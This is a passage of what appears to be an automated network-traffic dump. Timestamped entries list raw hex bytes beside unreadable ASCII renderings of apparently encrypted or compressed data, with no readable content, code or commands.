2e 6c 04 76 b9 50 b3 73 b2 16 0e 47 b8 0d 6f 5e c0 b7 6b 12 7f 87 c8 57 b7 1b d8 4d 46 85 db 57 6c de 82 4b 88
                                                                                                                                                                                          Data Ascii: rspi5C{NDY|RB}KW72G%l'1oQ6aC@YNZ@j`=#W9,>r7J=4!i+mZ4s!5*_Twm[-e8~/kA..lvPsGo^kWMFWlK
                                                                                                                                                                                          2023-08-10 08:17:30 UTC61INData Raw: df fb 0b 08 02 2c 4b 71 22 51 81 3b 83 98 bd 24 ea 03 64 c7 8c 85 96 74 42 e2 21 63 f0 02 b5 2f 5b 81 69 32 10 f4 12 ce cf 51 a2 c4 eb a8 6d fc 5c fc b2 00 92 aa b1 5e 9e 1f 50 75 d5 bc ae d7 5b cb 8d c4 b2 1a ab ef 03 da 09 95 e4 ff 12 0d 82 3a f3 d8 7f 27 8a 4c 8a b4 ad 04 26 de 1b 4c a3 f0 00 05 b2 fc 75 01 98 1f f3 78 22 9e 82 fd a3 13 8b 2c 78 dd 0b 7f 6c 84 ec 4c 7b 2c 68 8e 3f 40 84 8b 7a cd 4d 4c f1 cd 43 08 56 af 49 a0 c3 dd 69 66 50 b8 96 f7 d5 37 a4 fe 95 12 7b 1e 77 36 92 17 9c 60 92 21 08 c5 d3 be bd 3b b9 54 5a 4b 95 e5 d4 cf fe 23 35 8d 6a 48 f3 9a ac f4 8f 1b 3c d9 d3 d1 5c 0b ba 9c ce 81 7a be f8 dd 2c 05 0a c5 1c f0 aa 74 e0 f9 1f 02 dc 95 2c 82 ad 1d 53 9a 29 49 9c 12 f9 2d 4a a4 96 9f 7a 79 d5 2a 55 1c ad a9 d9 62 78 c4 dc ce 16 0c 6b
                                                                                                                                                                                          Data Ascii: ,Kq"Q;$dtB!c/[i2Qm\^Pu[:'L&Lux",xlL{,h?@zMLCVIifP7{w6`!;TZK#5jH<\z,t,S)I-Jzy*Ubxk
                                                                                                                                                                                          2023-08-10 08:17:30 UTC62INData Raw: 31 fc ad 38 ef 27 a7 90 ab 69 bf 0c 9b bb 8e 95 c7 b9 72 47 ce 69 4d d1 e4 42 39 1b c0 6c 12 87 df 48 59 b7 8e ae f3 79 4c bf 8c 64 b9 aa 18 a7 5d fc 45 31 d5 9b 72 01 b9 33 46 1c 7f fb 26 08 1e 27 52 08 16 07 66 38 a6 99 c2 2d 2d bb 77 be df be 7c d1 1d 94 13 be 20 0b 6f aa dc 89 2d ec af 2b 4f df 11 f5 ad 19 3a e6 22 82 dd cd d4 c8 18 8a 19 bf ac 91 ec 1f 9e 76 d2 3e 6c 4a a1 f2 d4 9a c4 29 f4 38 ee e7 af dc 44 33 0c 62 8d 58 99 01 30 9f be c8 a1 25 85 09 43 1a 95 b1 f9 95 bf 0b 95 b7 cc 5d a8 9d 2c 53 31 db fc 91 cc 46 33 95 5d e4 57 64 94 0f 82 05 06 6a 6c 77 39 21 e6 64 8e 14 1f 96 b6 c8 05 b1 ef cf f1 ce f9 cb cc 57 cd d5 6d ba 47 05 6c 02 d1 aa aa fa 72 92 94 07 6d f9 7a 40 1e 8b c5 2a 2e 5d c1 da dc 1b 11 9d 80 51 5c fc 74 ca 6e 48 b9 28 3a 7d ab
                                                                                                                                                                                          Data Ascii: 18'irGiMB9lHYyLd]E1r3F&'Rf8--w| o-+O:"v>lJ)8D3bX0%C],S1F3]Wdjlw9!dWmGlrmz@*.]Q\tnH(:}
                                                                                                                                                                                          2023-08-10 08:17:30 UTC63INData Raw: 90 a7 f4 30 71 38 f0 62 8a b5 a2 1f 87 5c fd 1a 62 3d 39 3e 54 2e d5 d2 fc d2 9f 8a a0 2d d3 3d c3 62 e5 99 eb 90 d7 cd 26 70 34 0e 6d 60 4b 9d a9 a1 ff 7c 9a 68 03 d2 c7 5d 8f d2 38 d1 e9 e6 f3 46 f9 52 71 18 86 76 31 85 ec cb fc b9 a6 6f fc f4 4b 9d dd 9b a2 e8 61 03 01 0a f9 97 9b bc 8b 6f 4f 1e 53 15 31 5f 26 50 56 fb 7b 80 e2 eb ff e2 c9 46 26 c7 f3 a7 24 83 a0 1e 4e 33 ce d8 65 ac 52 00 b8 76 02 6b bb af fc 13 60 9b 2b a7 b1 e8 57 b4 4a a7 71 c5 7e 45 bd 8b 31 2a 67 73 77 1c 61 3c c3 58 a1 a3 a1 6b ba 87 dd fa 79 37 b1 04 23 1f 88 53 9d 2b 96 48 e5 5b 6c 61 7c b1 72 40 60 44 04 ba e1 bd 53 60 b8 8f d1 74 8c 70 22 f0 0d 98 bf 18 5f b7 31 5a 00 c9 a1 14 bb e1 c7 92 74 d1 7b 7f 8b 3e 0c 85 7d 39 5a 9f cf 56 bd 09 92 fa c4 9e 99 79 3f 58 84 c2 1b 19 64
                                                                                                                                                                                          Data Ascii: 0q8b\b=9>T.-=b&p4m`K|h]8FRqv1oKaoOS1_&PV{F&$N3eRvk`+WJq~E1*gswa<Xky7#S+H[la|r@`DS`tp"_1Zt{>}9ZVy?Xd
                                                                                                                                                                                          2023-08-10 08:17:30 UTC64INData Raw: 0d 58 1b bc 5e 1d 8e aa 93 f4 b9 12 3a 9d 53 52 a8 a6 ec 37 77 59 97 1d 45 3c c6 9e d9 7b 05 fc 70 e0 5c 6e e6 b5 36 fa 5a c6 c2 5b 39 bc 7a 38 34 aa 80 8f c9 e1 9b 27 3a a9 fb 15 96 3e 86 10 20 b9 7e 64 7e b2 5f 81 4f 41 2d 7f ca 60 d7 38 44 b0 b1 38 11 b0 cd 8d 4b 75 38 7e e4 76 31 bb 56 05 5d 96 b3 e4 49 64 ea ce 37 7d 2f 18 93 ad e8 74 a2 bf 83 d7 c1 99 dc e3 0f a7 0c 2a ba 4a 51 dd 69 b7 6a 28 ef c8 fd 54 5b d8 67 ab 86 6b 4e b2 11 0a 37 65 42 4d 3f 49 c1 73 93 01 b1 b8 e4 53 25 95 72 24 18 09 f0 7d 32 36 19 f4 f3 56 f6 a1 d1 f4 5c 2a b9 3e 63 bc 6b fe be ab 4f 5a 32 25 8e ce bd 8f ba 08 69 9d f3 15 15 c4 87 05 a0 83 13 dc ea d8 2f 8b 93 dc 68 1c bd dc e7 f4 b0 bd ca 5c 98 64 97 d9 44 a2 c8 ac 3b cb 6a b7 05 01 67 14 e3 89 b6 99 65 0b 56 c4 d9 57 0d
                                                                                                                                                                                          Data Ascii: X^:SR7wYE<{p\n6Z[9z84':> ~d~_OA-`8D8Ku8~v1V]Id7}/t*JQij(T[gkN7eBM?IsS%r$}26V\*>ckOZ2%i/h\dD;jgeVW
                                                                                                                                                                                          2023-08-10 08:17:30 UTC65INData Raw: e9 45 57 ae 32 af ce 05 df fd 0b 33 26 3a b0 09 b1 86 32 1e 06 71 b1 b5 2a 06 4f 78 f1 a7 f2 70 a7 28 4d 5c 46 f0 dd 3a 20 75 34 48 b5 ee 05 ce b7 01 c6 a9 ab 23 55 d3 b9 97 18 7b 0a 02 49 69 f8 e3 2c 7a 58 c9 28 d6 55 b9 8f c9 ff 98 1e 4a 36 17 fd f4 1a 8e 95 8a c0 90 e4 2b 26 4a 91 df
                                                                                                                                                                                          Data Ascii: EW23&:2q*Oxp(M\F: u4H#U{Ii,zX(UJ6+&J
                                                                                                                                                                                          2023-08-10 08:17:30 UTC66INData Raw: 61 6a 83 53 ca 03 c7 bf 79 41 21 12 62 1f fd 74 c5 e5 75 35 5c 21 5e 4c 11 f0 11 d9 e5 ca 37 3b 9b 10 5c 82 50 9a f3 39 03 c1 b4 57 cc e5 6a 14 89 b6 30 53 59 52 c9 02 fc 7f 80 96 5e a5 7e 43 05 80 15 f6 ea 55 bd 89 73 c7 c1 df 75 fd ca d0 4b e1 fc fd 11 ea f2 21 16 fd e3 09 30 c9 63 82 13 62 c8 03 d7 dd f5 df a5 b9 41 1f 58 ca 42 18 99 68 6e a9 fa 1d 27 5f bd 39 5f 2f f2 e7 07 60 7a 9e af bc 87 9c ea 4a 33 d1 b1 80 7c 60 97 8d 64 ca 95 2e cd a7 d4 4d a4 db f7 26 0d 25 4a 3e 5c ae 25 12 6c 59 5a 45 6a 1a fd 42 6c da 19 8b 02 e3 73 6f 33 16 b6 9e a9 f7 96 e2 19 93 fb ed d0 9c e8 1b 6c a1 34 fa 34 88 12 28 64 1c d1 5b 37 e1 e5 70 7f a4 a1 f3 36 a5 3d a6 dd 82 b0 4c 82 f2 7a 85 dc b9 37 cc 6e fe de 26 85 c4 64 2d 1d 0a f7 ad 6f ca 7a 36 47 5e fa f7 12 db be
                                                                                                                                                                                          Data Ascii: ajSyA!btu5\!^L7;\P9Wj0SYR^~CUsuK!0cbAXBhn'_9_/`zJ3|`d.M&%J>\%lYZEjBlso3l44(d[7p6=Lz7n&d-oz6G^
                                                                                                                                                                                          2023-08-10 08:17:30 UTC67INData Raw: 34 61 16 e8 3f b1 d2 a6 59 d3 ac 3f ca d3 39 e1 fd 23 1f 85 1f 8d d3 08 d6 91 48 cc f8 f3 d5 85 28 fc 0b e9 91 e6 de b2 9f 89 6a 47 d5 16 cd f7 be 5a 43 d2 d9 8f 53 37 47 ed 49 30 5b cb a8 d9 cc 30 b1 24 37 6a e2 81 a9 d8 1d 8a 97 9e 60 f5 2e d9 7e 20 62 92 42 7a 8a b7 c1 a4 e0 98 c1 fa 49 2a fc 31 2c 45 42 43 19 37 02 77 5f f9 42 da 73 f9 0d 70 b4 d0 35 b8 c8 64 fd 04 fe a8 f6 2f 5c c3 88 0a 8e f3 29 cb 07 bb ad 36 b7 35 f5 74 f7 94 d4 6c a9 18 15 ed 25 6d f3 cb 5f ad d0 11 ca e5 c4 7c 9c 28 d2 ae 5e 7e 56 d2 4c 29 2e 57 8f 16 66 2b e1 4a a9 66 47 c9 94 2f 80 41 24 08 19 ec 3b c7 61 9c d3 7c 09 f1 02 48 26 54 20 0f 51 70 51 15 78 2a 32 80 78 91 c5 e1 b5 6c 62 4d df 7f bb 62 65 52 10 42 00 81 45 14 e8 88 d6 04 1d 04 72 52 d3 3d 21 e2 7f a6 79 e6 a6 89 34
                                                                                                                                                                                          Data Ascii: 4a?Y?9#H(jGZCS7GI0[0$7j`.~ bBzI*1,EBC7w_Bsp5d/\)65tl%m_|(^~VL).Wf+JfG/A$;a|H&T QpQx*2xlbMbeRBErR=!y4
                                                                                                                                                                                          2023-08-10 08:17:30 UTC68INData Raw: 19 bc cf 24 db 0e e9 b2 7b 0c 5c ed c7 85 4d 92 66 53 dd 23 72 9a ed c4 08 4f 43 10 16 7a 38 eb 39 35 d2 dd 61 21 95 9b ac 65 de e7 8e 3d af 1d 88 f9 2e 88 07 52 a5 da 18 4a 48 6d c4 f5 b8 b9 f5 98 0b 31 c7 5a 92 ef 18 0c 9e 85 5f 03 2c 7a 1a 40 96 e3 a1 b6 5a 42 26 c0 e3 d9 cc 52 76 05 46 45 69 7d f4 92 40 b0 a3 c1 50 b6 37 ee ea d1 38 a5 16 f1 d5 bd b5 14 df c8 07 26 af 97 68 3c 02 d4 dc 13 af d7 90 7e ab b7 75 69 8f 13 2d 2c e0 22 e4 41 56 c2 8a ff 45 03 2c fb 6e 18 e1 0d 4d dd c1 2a 68 b9 31 15 2d 53 e1 7e 99 f1 6f b1 1c 06 49 82 33 89 d9 84 3e 97 c8 71 8f 16 83 c6 52 f8 c0 e3 a8 36 5c f0 c7 de 21 4d 62 76 c8 4c d3 8d a6 4d 18 ac 0b 19 4a 2c 82 b4 5a 9e f4 cc 97 62 e9 2c 78 89 91 cb 37 fd f6 50 a6 52 9c 64 a2 53 0a d8 57 5c f3 71 01 cf 69 19 2c e3 de
                                                                                                                                                                                          Data Ascii: ${\MfS#rOCz895a!e=.RJHm1Z_,z@ZB&RvFEi}@P78&h<~ui-,"AVE,nM*h1-S~oI3>qR6\!MbvLMJ,Zb,x7PRdSW\qi,
                                                                                                                                                                                          2023-08-10 08:17:30 UTC69INData Raw: 0c aa 2f 55 77 fc 83 16 40 86 70 29 92 e2 16 f7 49 bf ad f9 b7 74 17 0e e7 10 05 a1 b7 4a 0c 75 3f 1c 69 dc 82 3a bd aa fc bc 8c 2b 27 71 b3 65 d1 8b 34 00 7a 17 ad 87 de 9d cf 94 be 81 67 40 f4 16 b2 1f 31 fd 03 8e 75 77 a7 f3 ac af c9 40 e7 0d af 5c e2 3f ed 99 81 e6 67 b7 b8 95 c0 51 1a a7 f7 5c a9 e0 ad d1 75 b0 fa 59 c6 1d 73 85 3b 31 10 9c 35 5b 43 1a 5a 9b 8c 2d 92 df a6 ac 5d ac 27 81 f3 38 a4 7d b3 4b 1c 48 5f bb 50 57 1a 11 f2 03 63 f7 2b 6c 8d 94 b9 49 a0 d8 8b e1 23 7d 13 92 df be 50 6c 7b 51 19 34 b9 90 2e 9d 50 fa db 5b 07 3c e2 6b 6d c7 78 21 6f a0 0a 17 65 56 eb 67 82 d5 31 46 80 3d aa d1 cc 1a b8 2a 95 45 18 2f 7b 0c 4d 22 6c 3d 86 d2 e2 67 60 f3 04 b2 29 f2 eb 0f 7a 2d 62 f2 88 16 83 46 65 a7 a4 70 99 48 50 f8 91 4d 9e 63 4b 96 2e a0 4c
                                                                                                                                                                                          Data Ascii: /Uw@p)ItJu?i:+'qe4zg@1uw@\?gQ\uYs;15[CZ-]'8}KH_PWc+lI#}Pl{Q4.P[<kmx!oeVg1F=*E/{M"l=g`)z-bFepHPMcK.L
                                                                                                                                                                                          2023-08-10 08:17:30 UTC70INData Raw: 8c 96 ff 93 fa 9c 14 63 43 46 05 76 a0 27 fb 7c d7 02 04 32 f4 2c 3b 19 ec 1a 9e ce ec 0f a0 19 4c e4 ab 90 8f 12 7b 61 89 59 c1 dc b2 9b 95 82 3d cc 19 ef ff f6 c4 46 00 fc b4 ce 08 09 c4 0d ab d0 1f 84 bf 0f d5 95 1d 26 8c 12 36 73 a4 f6 84 79 00 66 df a4 24 fa 51 23 84 52 e0 c6 2b 32 86 53 b9 ec a7 86 c5 2d 69 5f 67 22 66 0f 49 9d 3f 79 05 ba 1e b0 81 3b 1d 24 dd d6 4c 39 dd ea 95 18 68 b1 37 2b b9 06 ff c6 f7 d1 a3 59 a0 89 a8 d2 76 82 e6 67 86 79 26 d0 aa f0 9e 8e 40 7c 34 3d 8d fc b5 a1 8a 40 a2 7a b0 67 70 43 48 73 4a 67 a1 03 40 6c 1c 78 24 ed 3e 7f be 29 da d8 7b aa 3b 24 e9 76 2e 50 30 f7 6d 16 34 d4 60 03 31 a4 31 0e 3d fe 90 14 37 fa 57 7d 16 a3 1d 5a f1 be 84 b9 69 bd 7e 59 2d e4 25 67 51 e0 7e 1a 06 1f 93 4e fb 2e 07 8c 1a b6 6b 9f 99 cc 7a
                                                                                                                                                                                          Data Ascii: cCFv'|2,;L{aY=F&6syf$Q#R+2S-i_g"fI?y;$L9h7+Yvgy&@|4=@zgpCHsJg@lx$>){;$v.P0m4`11=7W}Zi~Y-%gQ~N.kz
                                                                                                                                                                                          2023-08-10 08:17:30 UTC72INData Raw: bd f3 b2 4b 2d 92 8a a6 0a 9e 0e 38 47 e9 6f 0e 3b 1d d4 ef b5 c5 4d c0 92 5b 18 3c 6b 90 03 32 c4 e0 f6 b8 ce 54 00 33 e8 88 fc cf 93 0f fc be fb 96 69 81 ff 0f 94 36 ac 79 27 a7 2a 62 97 88 a1 5d 3b 32 8f 6c 54 6a ad 4d 43 61 a5 ef 2d 67 8f 6c 1f 66 27 1f dd 08 5e 38 66 78 70 f9 b8 f0 fa 09 fc 47 65 d2 c7 b5 70 6e 94 87 bf 49 bf a6 8e 40 c0 ca b5 cb 4c ed cd 1c 2c aa fe 4a fa fd b3 18 fe 74 d6 70 72 14 ce 21 c3 a7 96 a0 fd 0c 2a c5 80 e6 18 35 cf c0 0f 09 6a c3 91 36 31 dc 7d 45 bb 4d 20 ea 6d 66 54 d6 9d ee 75 1d 0f 5b 64 53 6e 75 24 34 bc f9 cf c4 c5 d1 1a eb 84 36 a9 01 ec 8c 7a 19 3e bc a9 03 e9 f6 66 d6 68 ef bc b8 a9 4d a5 a9 67 23 d0 7c 5e 18 58 44 2e 83 a5 ce f2 a5 e4 98 d0 2a 00 3d 24 02 1c b3 05 6d 2e c7 3b f3 cc e7 b8 23 b2 cf c2 aa c3 a0 97
                                                                                                                                                                                          Data Ascii: K-8Go;M[<k2T3i6y'*b];2lTjMCa-glf'^8fxpGepnI@L,Jtpr!*5j61}EM mfTu[dSnu$46z>fhMg#|^XD.*=$m.;#
                                                                                                                                                                                          2023-08-10 08:17:30 UTC73INData Raw: 31 59 5d b3 dd 44 52 d5 d9 a8 a3 61 1a 5c 83 60 31 4d 0d 42 60 d4 56 ea b6 9f 55 43 8f c5 28 ab b9 47 46 4d 0b 40 d8 cf b3 21 da ee 2d 8d cb 13 38 a7 7b 98 0c 15 0b 0b 0d 85 83 cf 3e 7c ab 11 db 3e d3 c1 e6 a8 e5 5c 8a 72 fd 76 20 c1 ff 89 0b 61 62 c4 51 73 4b b8 94 83 e9 5c a6 8e 3c 9a 48 71 c7 b3 c9 5d 16 78 2b 01 ea 3b da de e5 2c fa a6 95 1d ab a0 f1 7d 5d df 6c 90 57 10 a7 4c 7b ae 66 b4 13 64 09 63 2b 52 1c 4f f9 4e 90 9c 7c 29 d6 fc 9d 15 77 9c 54 50 68 c2 82 4a 00 23 91 22 92 53 50 22 cc c2 86 93 9d 51 2c 9a 54 db 65 cd 40 b3 33 69 7d 18 77 df 9a d8 e6 86 8d 80 46 77 a1 ff 27 b7 c4 29 12 e2 8c 74 3a 6d 39 fd c7 d2 e2 56 0f 28 e3 f4 7e 42 ce 22 49 be ac 17 3d 61 60 b3 52 53 83 b0 c9 a7 2d 3f 9d bf 3f 56 cc 19 8e 7c 4d a9 fa 73 f9 96 8d 82 e7 24 13
                                                                                                                                                                                          Data Ascii: 1Y]DRa\`1MB`VUC(GFM@!-8{>|>\rv abQsK\<Hq]x+;,}]lWL{fdc+RON|)wTPhJ#"SP"Q,Te@3i}wFw')t:m9V(~B"I=a`RS-??V|Ms$
                                                                                                                                                                                          2023-08-10 08:17:30 UTC74INData Raw: c9 55 ba bb 8c d0 99 3c 25 74 8d 1c bc dd 3a e5 a5 7d 17 d0 54 24 1d 4b bb c8 c3 2c e6 4c d9 1b 83 ac a2 a9 a8 86 31 40 18 f4 3f 91 3e 6d 7e 49 85 73 3b 42 67 c9 5c 56 00 ae 3b 91 ca 61 7f b3 cd 30 f8 d8 88 b9 4b ac 9b 1b d0 e5 37 a9 6e 87 42 56 ed 9c a1 d7 f3 78 15 c1 f2 00 8e 07 f5 0f 4b 28 4e ea 88 fe 50 9d 46 7f 94 5c 88 d9 cb 16 99 30 8d 6b 01 99 ba 75 a2 cb 91 ec 45 d1 3f 01 78 9e 19 f4 e9 0d 6a b5 21 92 7b c2 54 54 89 c5 42 e3 6a c9 15 d2 3c 3e 7b 05 cc 45 0d 00 a0 58 55 46 3c 82 a1 56 61 3d 64 6b 4a 18 a7 0b 73 0c 94 fd fe 0a b7 6e de bb 7d 88 65 e7 80 1b 61 30 73 6e 61 49 09 3a 48 88 25 d0 0f 8a b7 19 b0 0e 61 2c 0e a7 40 8f 68 24 f0 be a5 16 97 52 5f e4 d8 cc ae 45 8a a3 01 13 c1 ae 29 86 28 cf 46 eb 62 08 11 c6 f9 39 ed 33 4b 8b 49 ab 6a 69 0c
                                                                                                                                                                                          Data Ascii: U<%t:}T$K,L1@?>m~Is;Bg\V;a0K7nBVxK(NPF\0kuE?xj!{TTBj<>{EXUF<Va=dkJsn}ea0snaI:H%a,@h$R_E)(Fb93KIji
                                                                                                                                                                                          2023-08-10 08:17:30 UTC75INData Raw: 98 88 bb d9 03 92 1e a6 17 da 36 c0 2d 95 a3 b1 58 df 8f 45 d8 29 c0 8f 68 af 8e 7e 31 11 22 6d f9 34 a0 1c 70 61 11 28 8c 96 07 f9 47 b8 01 e9 95 78 ee d4 72 c9 5e 0d 58 66 99 c0 bc 79 43 aa 52 0c 8a e6 99 a5 a5 6b 3c 8b 97 88 91 5d 02 39 44 2c fa 42 ae 96 2c f8 a7 84 8e 16 45 87 3b 38 5f 9a 1b 4c 0a 0e 86 b0 86 7d e1 12 f9 e6 97 db 7b cd bd ea f6 17 ea dd ca d8 8b 8e 6c af df e8 11 a2 17 82 49 85 f9 76 8d 44 ec 00 90 a0 36 f4 2c 6c 01 9c e0 31 8f a7 3f 24 dc a7 a2 94 b0 ac d3 d8 d0 8c ed a4 46 a5 37 a2 6d 90 ad c5 9d 5a 34 60 d8 6d b9 0e 15 10 dc 98 91 4a b4 45 de e1 a1 10 25 73 a2 17 1c 4d be 72 bc 1d 6f c4 30 8c 1f bd 06 eb 94 47 cb 05 b3 b6 39 e3 5a 24 63 b2 3f 02 f6 d9 46 1a 93 26 c9 80 b9 3f c0 90 dd 57 d3 09 51 50 23 c5 bd 86 9c 3a 34 d7 6e 83 6b
                                                                                                                                                                                          Data Ascii: 6-XE)h~1"m4pa(Gxr^XfyCRk<]9D,B,E;8_L}{lIvD6,l1?$F7mZ4`mJE%sMro0G9Z$c?F&?WQP#:4nk
                                                                                                                                                                                          2023-08-10 08:17:30 UTC77INData Raw: af 2b 41 ff 6f 6f 47 24 5a fa 1f 51 91 20 39 4a 35 16 c0 18 78 bf 72 f7 6e 0d 9a c4 33 61 85 a4 e3 06 ef d9 a1 ca c4 a9 a3 7d 40 d8 f4 13 1f ad 56 23 0d d3 b1 d4 56 ce 6d c1 a7 e5 21 85 fb 5d 45 38 10 3a c3 99 65 d9 fa cd 47 d6 6f 9d ef 2a 14 5d b9 94 30 4b 94 37 86 5f 56 14 f7 87 93 4c 23 d9 53 d6 ba 3e 80 19 79 f1 92 36 9e 11 e3 25 81 21 28 ad ef 81 2c 18 75 8b 54 31 50 fd 70 3a 1e 9b e1 38 68 a9 8a 8e 8d 6c f6 4d e6 ec f2 0f 71 5e 79 64 4b aa 0e a2 0c 3c d9 9b 22 a4 3e f5 be 93 08 6d 1a dc cf 80 d7 de d3 c0 7d 62 87 3f 5b a7 11 26 1b 67 24 b1 44 77 88 84 6b 1b 8f 2b 25 8d 07 8e f6 13 1d 33 3a 1c 61 ac 52 a5 db 25 5c a3 91 02 86 d4 61 67 73 9e f7 62 b4 5e 3b 4b 1c 0b 33 b2 fa e4 31 d3 b8 f1 01 ed 8f 36 98 08 9e 12 44 12 5f 96 1e c6 34 46 ca 7b c5 89 60
                                                                                                                                                                                          Data Ascii: +AooG$ZQ 9J5xrn3a}@V#Vm!]E8:eGo*]0K7_VL#S>y6%!(,uT1Pp:8hlMq^ydK<">m}b?[&g$Dwk+%3:aR%\agsb^;K316D_4F{`
                                                                                                                                                                                          2023-08-10 08:17:30 UTC78INData Raw: 4b a0 c9 1f 2d a3 17 67 85 bb 0b 32 51 17 9f c6 61 47 a3 b8 d2 e2 cf f4 db fb 7d 20 00 af fd a4 15 60 d4 0c ab 98 bc f9 14 2e 33 4c 00 54 73 fd d5 e6 99 40 53 24 be d7 b4 c8 8d 5c 3a 85 f4 0c b3 6c 01 f2 02 b2 b3 b3 71 b3 8a f5 8c 5d d7 70 b0 c8 db a1 28 b0 e7 da a8 66 32 d4 04 a2 4e f7 89 c4 d2 b5 18 83 fb 81 2c 0a 15 74 a0 4e 50 b5 fe 6e 38 65 ca a6 52 cd 8c 72 61 b3 e8 ec ba 1d 5e 71 e3 6c 62 1d 5a 3c f6 1f 36 bc 92 27 1f 1c 53 69 13 03 06 21 07 70 87 4a 58 08 75 bb ef 81 b5 97 78 c4 d3 31 cb 2b a4 75 3e 62 b9 24 69 3c 4b 02 11 19 c5 06 56 bb 32 5c 3b 24 35 8b e9 44 15 d2 8e fc 71 90 03 6d f9 9c b6 97 0f 61 58 c2 42 c1 09 93 5d 7a 30 8c 08 fe d1 eb ee ad 8a 36 53 47 ad 1c 8c eb c4 b7 38 43 d2 54 40 95 48 8e e0 5d 5b 9a 71 6c c8 75 9e 53 30 52 aa 16 94
                                                                                                                                                                                          Data Ascii: K-g2QaG} `.3LTs@S$\:lq]p(f2N,tNPn8eRra^qlbZ<6'Si!pJXux1+u>b$i<KV2\;$5DqmaXB]z06SG8CT@H][qluS0R
                                                                                                                                                                                          2023-08-10 08:17:30 UTC79INData Raw: 2d ad d8 92 20 ed 69 18 c2 a9 1f 3d e9 d9 ff 10 f7 ba bd 7f 0c 54 69 be 1c 48 1f 3b 59 b2 2f 19 28 4f 0f f7 44 35 e1 08 43 c5 5e 2c 17 0f 0d 91 23 85 4c 1c 90 5e ae 7b ba 10 12 a7 26 38 81 d3 db 0a f9 74 ee c5 a4 cb 8f 50 e0 be ea 1b 19 6d 20 57 ee 33 cb 9a b7 d4 aa 95 70 00 1b d8 25 27 94 27 b8 49 7a cd 44 d1 8c f5 9f 9c 27 80 97 2a 5d 66 09 d9 dd 50 26 e7 74 90 c2 17 aa 22 ec f5 da 37 d7 f0 f0 6f c6 7a a6 dc 4b 42 68 14 47 4a 4c d2 5b 89 63 79 c3 bc 5d c8 da f0 e5 43 a0 ad c2 c9 80 96 01 5e 27 06 ef 5d 71 53 49 dd 92 2f 97 ae dc 1c ad c4 34 60 43 11 3c 90 2f 49 70 47 01 7e 80 06 18 d2 c8 73 5e d1 93 6b 84 05 4c d0 54 6f 4b 3f 90 76 1e 30 23 65 ce 84 9b ef 65 13 e7 2e 2d 52 46 19 81 06 bf 17 2e 2c 7a 29 8d 5b 68 e0 21 7c 26 d1 e0 c7 12 e5 b4 60 32 2b 93
                                                                                                                                                                                          Data Ascii: - i=TiH;Y/(OD5C^,#L^{&8tPm W3p%''IzD'*]fP&t"7ozKBhGJL[cy]C^']qSI/4`C</IpG~s^kLToK?v0#ee.-RF.,z)[h!|&`2+
                                                                                                                                                                                          2023-08-10 08:17:30 UTC80INData Raw: 62 23 00 bf 40 73 7f 7b 67 0c 2a 48 f7 e2 8f 5e 79 3e 4d f7 2a 93 cc 67 67 96 55 e4 45 ad 45 cb a0 8d 15 cc 2c b4 d9 c5 81 9f d6 2e 9f 98 7c 35 df 01 ee 6a 15 4a 07 e3 3a 94 f7 78 a2 25 c1 9e 8f 28 9b 35 c6 f3 a7 ef 8a 8b c9 53 8c 1d fb 48 39 fa 90 b5 10 e4 f0 8f ec 7f 21 c8 f1 5a 75 c4 1a a6 d4 67 5c b5 63 ab d1 fa 16 5f 1b dc 59 49 41 70 cb 2a c0 17 7e 5f 49 64 03 b4 44 96 f2 37 c9 ca 4c f5 a9 29 4e c2 85 4f ef 18 af b6 f1 dc 99 95 0b 17 7d 47 ea 16 9e 51 fb 12 16 11 2a 9f 34 a1 eb 7f d0 6e 25 75 7f 6a 8a df d6 3f 73 a3 50 5d 7e 77 c5 8a 86 85 eb f4 71 c5 14 2a fd 10 0d 3c 87 6d 92 0f 80 53 dd f5 e6 2d fc e8 40 6c e8 ed 23 51 b0 9f 82 5f d6 57 dd 4f b1 5c b1 c4 4c 02 ea 53 7c 48 9a 7e 6e f4 0c 15 8d 91 02 d0 2a 41 03 6d 15 23 48 bb a8 62 c5 be 17 24 8d
                                                                                                                                                                                          Data Ascii: b#@s{g*H^y>M*ggUEE,.|5jJ:x%(5SH9!Zug\c_YIAp*~_IdD7L)NO}GQ*4n%uj?sP]~wq*<mS-@l#Q_WO\LS|H~n*Am#Hb$
                                                                                                                                                                                          2023-08-10 08:17:30 UTC81INData Raw: 63 32 3e 9f 4b 35 78 6f 88 67 f1 b9 b8 08 6f 17 d9 28 48 d5 af 1b f7 8c e8 3f 31 1f a0 f9 52 df 01 f6 4e 07 2e e9 63 66 05 5d 03 a3 5c 44 b1 59 fa d2 17 fc aa 7d ef 22 d2 3b be df 6c b2 5d 94 83 dd c6 f9 49 42 60 88 c7 ec 9b ec c7 89 d5 55 48 75 30 e3 fd a8 92 78 85 83 23 04 1b 76 86 72 a5 aa ab 38 50 bc b8 36 9f fd 81 75
                                                                                                                                                                                          Data Ascii: c2>K5xogo(H?1RN.cf]\DY}";l]IB`UHu0x#vr8P6u
                                                                                                                                                                                          2023-08-10 08:17:30 UTC82INData Raw: 68 f7 4a 13 a5 39 30 b7 0d 1e 85 5d 53 af bb 8e 8f 80 e8 f0 23 43 7d bd e7 76 a6 f4 e5 9e 78 fd 03 57 e4 fd 86 cd 6f 7f 10 89 e3 03 77 66 23 a1 a0 35 c8 13 be 8e 1b 52 b4 fc 0d 39 11 ac 62 fe 36 7f 60 ca 2b ff d3 68 fa 5d 12 75 dd 7d 10 34 9b 95 90 a0 5d 87 86 3d 31 70 5b 26 ec 5c b0 e8 28 24 fb c7 ec 15 54 b7 7b 55 4b 5d 76 91 c5 5b 5f ec 2e ee 04 e2 d7 57 47 26 39 b9 a3 76 b3 4d 0a 3c 1b e2 2a 59 78 1b 55 7f c3 8b ef 5e 7f 2a ae 2e 8e 04 1a 8c 5f ea 4d 85 36 e1 cb 75 ef 1e 3a a0 d9 99 0d f5 b5 e5 25 8a 93 cc d7 6d 24 2e 55 21 4c f8 9f e4 3e 23 7a 1b b5 5c 50 d9 64 3d 05 ea b6 83 a2 b8 de ed 5a 17 4b d6 d4 90 a0 cb fa 0b 82 65 f2 0f af 92 05 a3 c5 8b ba 22 40 83 11 e2 13 82 c5 d9 b3 2c e5 f9 f4 2d 9a 7b 12 c3 20 17 0e 5f e5 fd 30 37 ff 67 c2 87 ab bc 95
                                                                                                                                                                                          Data Ascii: hJ90]S#C}vxWowf#5R9b6`+h]u}4]=1p[&\($T{UK]v[_.WG&9vM<*YxU^*._M6u:%m$.U!L>#z\Pd=ZKe"@,-{ _07g
